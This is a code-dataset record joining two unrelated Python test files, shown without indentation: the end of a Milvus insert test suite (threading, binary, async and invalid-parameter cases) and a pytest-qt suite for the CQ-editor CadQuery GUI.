tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable auto-flush
method: disable auto-flush and insert, get entity
expected: the count is equal to 0
"""
delete_nums = 500
ut.disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=ut.gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
"""
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
"""
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_multi_times(self, connect, binary_collection):
"""
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
"""
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
"""
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
"""
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, _ = ut.gen_search_vectors_params(binary_field_name, default_binary_entities,
ut.default_top_k, 1, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
logging.getLogger().debug(res)
assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, ut.gen_entities(nb), _async=False)
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 50000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 100000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_invalid_params(self, connect):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
collection_new = ut.gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_multi_collections(self, connect):
"""
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
"""
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = ut.gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
"""
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_search_entity_insert_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2 a while
method: search collection, sleep, and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
"""
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
"""
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test insert with invalid scenario
method: insert with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
"""
target: test insert with invalid field
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
field_value = get_field_int_value
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
"""
target: test insert with invalid entity
method: insert with invalid entity value
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
"""
target: test insert with invalid field name
method: insert with invalid field name
expected: raise exception
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid scenario
method: insert with invalid field entity
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
test_app.py | from path import Path
import os, sys, asyncio
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
from multiprocessing import Process
import pytest
import pytestqt
import cadquery as cq
from PyQt5.QtCore import Qt, QSettings
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from cq_editor.__main__ import MainWindow
from cq_editor.widgets.editor import Editor
from cq_editor.cq_utils import export, get_occ_color
code = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)'''
code_bigger_object = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(20, 20, 0.5)
result = result.edges("|Z").fillet(0.125)
'''
code_show_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result)
'''
code_show_Workplane_named = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
log('test')
show_object(result,name='test')
'''
code_show_Shape = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result.val())
'''
code_debug_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
debug(result)
'''
code_multi = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
result2 = cq.Workplane("XY" ).box(3, 3, 0.5).translate((0,15,0))
'''
def _modify_file(code):
with open('test.py', 'w', 1) as f:
f.write(code)
def modify_file(code):
p = Process(target=_modify_file,args=(code,))
p.start()
p.join()
def get_center(widget):
pos = widget.pos()
pos.setX(pos.x()+widget.width()//2)
pos.setY(pos.y()+widget.height()//2)
return pos
def get_bottom_left(widget):
pos = widget.pos()
pos.setY(pos.y()+widget.height())
return pos
def get_rgba(ais):
alpha = ais.Transparency()
color = get_occ_color(ais)
return color.redF(),color.redF(),color.redF(),alpha
@pytest.fixture
def main(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
win = MainWindow()
win.show()
qtbot.addWidget(win)
editor = win.components['editor']
editor.set_text(code)
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
return qtbot, win
@pytest.fixture
def main_clean(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
win = MainWindow()
win.show()
qtbot.addWidget(win)
qtbot.waitForWindowShown(win)
editor = win.components['editor']
editor.set_text(code)
return qtbot, win
@pytest.fixture
def main_clean_do_not_close(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.No)
win = MainWindow()
win.show()
qtbot.addWidget(win)
qtbot.waitForWindowShown(win)
editor = win.components['editor']
editor.set_text(code)
return qtbot, win
@pytest.fixture
def main_multi(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))
win = MainWindow()
win.show()
qtbot.addWidget(win)
qtbot.waitForWindowShown(win)
editor = win.components['editor']
editor.set_text(code_multi)
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
return qtbot, win
def test_render(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
log = win.components['log']
# enable CQ reloading
debugger.preferences['Reload CQ'] = True
# check that object was rendered
assert(obj_tree_comp.CQ.childCount() == 1)
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_Workplane)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 1)
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that cq.Shape object was rendered using explicit show_object call
editor.set_text(code_show_Shape)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 1)
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# test rendering via console
console.execute(code_show_Workplane)
assert(obj_tree_comp.CQ.childCount() == 1)
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
console.execute(code_show_Shape)
assert(obj_tree_comp.CQ.childCount() == 1)
# check object rendering using show_object call with a name specified and
# debug call
editor.set_text(code_show_Workplane_named)
debugger._actions['Run'][0].triggered.emit()
qtbot.wait(100)
assert(obj_tree_comp.CQ.child(0).text(0) == 'test')
assert('test' in log.toPlainText().splitlines()[-1])
def test_export(main,mocker):
qtbot, win = main
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
#set focus
obj_tree = win.components['object_tree'].tree
obj_tree_comp = win.components['object_tree']
qtbot.mouseClick(obj_tree, Qt.LeftButton)
qtbot.keyClick(obj_tree, Qt.Key_Down)
qtbot.keyClick(obj_tree, Qt.Key_Down)
#export STL
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.stl',''))
obj_tree_comp._export_STL_action.triggered.emit()
assert(os.path.isfile('out.stl'))
#export STEP
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))
obj_tree_comp._export_STEP_action.triggered.emit()
assert(os.path.isfile('out.step'))
#clean
os.remove('out.step')
os.remove('out.stl')
def number_visible_items(viewer):
from OCP.AIS import AIS_ListOfInteractive
l = AIS_ListOfInteractive()
viewer_ctx = viewer._get_context()
viewer_ctx.DisplayedObjects(l)
return l.Extent()
def test_inspect(main):
qtbot, win = main
#set focus and make invisible
obj_tree = win.components['object_tree'].tree
qtbot.mouseClick(obj_tree, Qt.LeftButton)
qtbot.keyClick(obj_tree, Qt.Key_Down)
qtbot.keyClick(obj_tree, Qt.Key_Down)
qtbot.keyClick(obj_tree, Qt.Key_Space)
#enable object inspector
insp = win.components['cq_object_inspector']
insp._toolbar_actions[0].toggled.emit(True)
#check if all stack items are visible in the tree
assert(insp.root.childCount() == 3)
#check if correct number of items is displayed
viewer = win.components['viewer']
insp.setCurrentItem(insp.root.child(0))
assert(number_visible_items(viewer) == 4)
insp.setCurrentItem(insp.root.child(1))
assert(number_visible_items(viewer) == 7)
insp.setCurrentItem(insp.root.child(2))
assert(number_visible_items(viewer) == 4)
insp._toolbar_actions[0].toggled.emit(False)
assert(number_visible_items(viewer) == 3)
def test_debug(main,mocker):
# store the tracing function
trace_function = sys.gettrace()
class event_loop(object):
'''Used to mock the QEventLoop for the debugger component
'''
def __init__(self,callbacks):
self.callbacks = callbacks
self.i = 0
def exec_(self):
if self.i<len(self.callbacks):
self.callbacks[self.i]()
self.i+=1
def exit(self,*args):
pass
def assert_func(x):
'''Neddedd to perform asserts in lambdas
'''
assert(x)
def patch_debugger(debugger,event_loop_mock):
debugger.inner_event_loop.exec_ = event_loop_mock.exec_
debugger.inner_event_loop.exit = event_loop_mock.exit
qtbot, win = main
#clear all
obj_tree = win.components['object_tree']
obj_tree.toolbarActions()[0].triggered.emit()
editor = win.components['editor']
editor.set_text(code)
debugger = win.components['debugger']
actions = debugger._actions['Run']
run,debug,step,step_in,cont = actions
variables = win.components['variables_viewer']
viewer = win.components['viewer']
assert(number_visible_items(viewer) == 3)
#check breakpoints
assert(debugger.breakpoints == [])
#check _frames
assert(debugger._frames == [])
#test step through
ev = event_loop([lambda: (assert_func(variables.model().rowCount() == 4),
assert_func(number_visible_items(viewer) == 3),
step.triggered.emit()),
lambda: (assert_func(variables.model().rowCount() == 4),
assert_func(number_visible_items(viewer) == 3),
step.triggered.emit()),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 3),
step.triggered.emit()),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit())])
patch_debugger(debugger,ev)
debug.triggered.emit(True)
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
#test exit debug
ev = event_loop([lambda: (step.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 1),
assert_func(number_visible_items(viewer) == 3),
debug.triggered.emit(False),)])
patch_debugger(debugger,ev)
debug.triggered.emit(True)
assert(variables.model().rowCount() == 1)
assert(number_visible_items(viewer) == 3)
#test breakpoint
ev = event_loop([lambda: (cont.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit(),)])
patch_debugger(debugger,ev)
editor.debugger.set_breakpoints([(4,None)])
debug.triggered.emit(True)
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
#test breakpoint without using singals
ev = event_loop([lambda: (cont.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit(),)])
patch_debugger(debugger,ev)
editor.debugger.set_breakpoints([(4,None)])
debugger.debug(True)
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
#test debug() without using singals
ev = event_loop([lambda: (cont.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit(),)])
patch_debugger(debugger,ev)
editor.set_text(code_debug_Workplane)
editor.debugger.set_breakpoints([(4,None)])
debugger.debug(True)
CQ = obj_tree.CQ
# object 1 (defualt color)
r,g,b,a = get_rgba(CQ.child(0).ais)
assert( a == pytest.approx(0.2) )
assert( r == 1.0 )
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
# restore the tracing function
sys.settrace(trace_function)
code_err1 = \
'''import cadquery as cq
(
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
'''
code_err2 = \
'''import cadquery as cq
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
f()
'''
def test_traceback(main):
# store the tracing function
trace_function = sys.gettrace()
qtbot, win = main
editor = win.components['editor']
debugger = win.components['debugger']
traceback_view = win.components['traceback_viewer']
actions = debugger._actions['Run']
run,debug,step,step_in,cont = actions
editor.set_text(code_err1)
run.triggered.emit()
assert('SyntaxError' in traceback_view.current_exception.text())
debug.triggered.emit()
assert('SyntaxError' in traceback_view.current_exception.text())
assert(debug.isChecked() == False)
editor.set_text(code_err2)
run.triggered.emit()
assert('NameError' in traceback_view.current_exception.text())
# restore the tracing function
sys.settrace(trace_function)
@pytest.fixture
def editor(qtbot):
win = Editor()
win.show()
qtbot.addWidget(win)
return qtbot, win
def conv_line_ends(text):
return '\n'.join(text.splitlines())
def test_editor(monkeypatch,editor):
qtbot, editor = editor
with open('test.py','w') as f:
f.write(code)
#check that no text is present
assert(editor.get_text_with_eol() == '')
#check that loading from file works properly
editor.load_from_file('test.py')
assert(len(editor.get_text_with_eol()) > 0)
assert(conv_line_ends(editor.get_text_with_eol()) == code)
#check that loading from file works properly
editor.new()
assert(editor.get_text_with_eol() == '')
#monkeypatch QFileDialog methods
def filename(*args, **kwargs):
return 'test.py',None
def filename2(*args, **kwargs):
return 'test2.py',None
monkeypatch.setattr(QFileDialog, 'getOpenFileName',
staticmethod(filename))
monkeypatch.setattr(QFileDialog, 'getSaveFileName',
staticmethod(filename2))
#check that open file works properly
editor.open()
assert(conv_line_ends(editor.get_text_with_eol()) == code)
#check that save file works properly
editor.new()
qtbot.mouseClick(editor, Qt.LeftButton)
qtbot.keyClick(editor,Qt.Key_A)
assert(editor.document().isModified() == True)
editor.filename = 'test2.py'
editor.save()
